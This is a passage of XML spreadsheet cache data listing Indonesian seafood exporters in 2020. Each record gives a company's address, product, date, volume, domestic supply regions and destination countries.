    <n v="12"/>
    <s v="Kulit Ikan Kering"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19252"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar, Kota Bima, Kota Bitung, Kabupaten Maluku Tenggara, Kabupaten Fakfak, Kabupaten Sorong"/>
    <s v="Belgium, China, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20117"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kota Makassar"/>
    <s v="Brunei Darussalam, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21331"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Layang, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Sri Lanka, Thailand"/>
  </r>
  <r>
    <n v="20116"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat"/>
    <s v="Brunei Darussalam, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19967"/>
    <x v="45"/>
    <s v="PT, BINTANG JAYAKOTA MANDIRI"/>
    <s v="Jl, Ikan Tuna Raya IV No,16, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Lencam, Kerapu, Kakap Merah, Kurau, Kurisi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Badung, Kota Denpasar"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19664"/>
    <x v="60"/>
    <s v="KSU ADI JAYA LESTARI"/>
    <s v="Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20834"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Daging Lobster Beku"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Brunei Darussalam, China, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19439"/>
    <x v="52"/>
    <s v="PT. BAHARI PRATAMA MANDIRI"/>
    <s v="Jl. Pelita Cipatuguran RT 04 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19669"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="20233"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Barramundi, Emperor, Anggoli, Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="690000"/>
    <m/>
    <s v="Australia, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20303"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20304"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Kerapu, Kakatua, Bawal, Kakap Merah)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="17162"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pati, Kota Tegal, Kabupaten Lamongan, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="17158"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21132"/>
    <x v="62"/>
    <s v="PT. TIMUR JAYA CEMERLANG"/>
    <s v="Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Siput Beku"/>
    <d v="2020-08-14T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Bouvet Island, China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="17160"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Thailand, United States"/>
  </r>
  <r>
    <n v="20000"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Kerang Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20001"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20002"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20003"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20004"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20005"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20006"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20007"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19243"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pati, Kabupaten Semarang, Kota Tegal, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kota Surabaya, Kota Manado, Kota Palu, Kabupaten Sorong"/>
    <s v="Belgium, China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19242"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kuwe, Marlin, Talang-talang, Selar, Layang, Tenggiri)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara, Kota Tegal, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Sorong"/>
    <s v="Belgium, China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20096"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="4000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat"/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20637"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Lamongan, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21329"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Gulama, Manyung, Kerapu, Layur, Kakap Merah, Kuro, Kurisi)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Bekasi, Kabupaten Tangerang"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19966"/>
    <x v="45"/>
    <s v="PT, BINTANG JAYAKOTA MANDIRI"/>
    <s v="Jl, Ikan Tuna Raya IV No,16, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <s v="China, Jordan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20234"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="230000"/>
    <m/>
    <s v="Australia, China, Japan, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="21028"/>
    <x v="54"/>
    <s v="PT. TEMAN LAUT"/>
    <s v="Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20779"/>
    <x v="63"/>
    <s v="PT. SEKAR BUMI TBK"/>
    <s v="Jl. Millennium Raya Blok L1 No.1 Kawasan Industri Millennium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20964"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Hidup"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20126"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Udang Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar, Kabupaten Lombok Barat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21251"/>
    <x v="64"/>
    <s v="CV. BINTANG FAHRI INTERNASIONAL"/>
    <s v="Jl. Ternate, Gg. H. Kasim, Kel. Merauke, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="482"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21252"/>
    <x v="64"/>
    <s v="CV. BINTANG FAHRI INTERNASIONAL"/>
    <s v="Jl. Ternate, Gg. H. Kasim, Kel. Merauke, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19826"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19827"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Selayang, Selar, Tenggiri)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19829"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19979"/>
    <x v="65"/>
    <s v="UD. BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec. Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19980"/>
    <x v="65"/>
    <s v="UD. BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec. Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20810"/>
    <x v="66"/>
    <s v="PT. MUARA ANUGERAH JAYA"/>
    <s v="Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Gabus Laut, Senangin, Lemadang, Gindara, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19828"/>
    <x v="65"/>
    <s v="UD, BIMA BAHARI MANDIRI"/>
    <s v="Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Gulama, Kambing-kambing, Biji Nangka, Kerapu, Layur, Beloso, Merah, Kakap)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="16883"/>
    <x v="67"/>
    <s v="PT. FISHNESIA MITRA BERSAMA"/>
    <s v="Jl. Rungkut Industri III No.75 RT 04 RW 05, Kel. Rungkut Tengah, Kec. Gununganyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku Untuk Umpan"/>
    <d v="2020-01-27T00:00:00"/>
    <n v="2400"/>
    <m/>
    <s v="Japan, South Africa, Spain, Sri Lanka, Suriname, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20760"/>
    <x v="15"/>
    <s v="UD. HALIM JAYA"/>
    <s v="Jl. Raya Deli Tua - Patumbak Km 18.5, Jl. Lantasan Baru No.1, Kel. Cinta Damai, Kec. Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Labi-Labi Hidup"/>
    <d v="2020-06-10T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore"/>
  </r>
  <r>
    <n v="20893"/>
    <x v="68"/>
    <s v="PT. SINAR SURYA ALAM"/>
    <s v="Jl. Raya Tuban Tambakboyo, Kel. Sobontoro, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-06-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20894"/>
    <x v="68"/>
    <s v="PT. SINAR SURYA ALAM"/>
    <s v="Jl. Raya Tuban Tambakboyo, Kel. Sobontoro, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-06-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21312"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25 , Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Swanggi, Terbang, Senangin, Kuwe, Layur, Kembung, Beloso, Cakalang, Tenggiri, Tetengkek)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="1700089.77"/>
    <s v="Kota Jakarta Utara, Kabupaten Probolinggo, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Ambon"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Saudi Arabia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20719"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Deho, Marlin, Meka, Layaran, Layang, Cakalang, Tenggiri, Pedang, Lemadang)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19845"/>
    <x v="69"/>
    <s v="CV. ALAM CIPTA SAMUDRA"/>
    <s v="Jl. Perancis Pergudangan Kosambi Permai Blok II 30, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21152"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Gurita)"/>
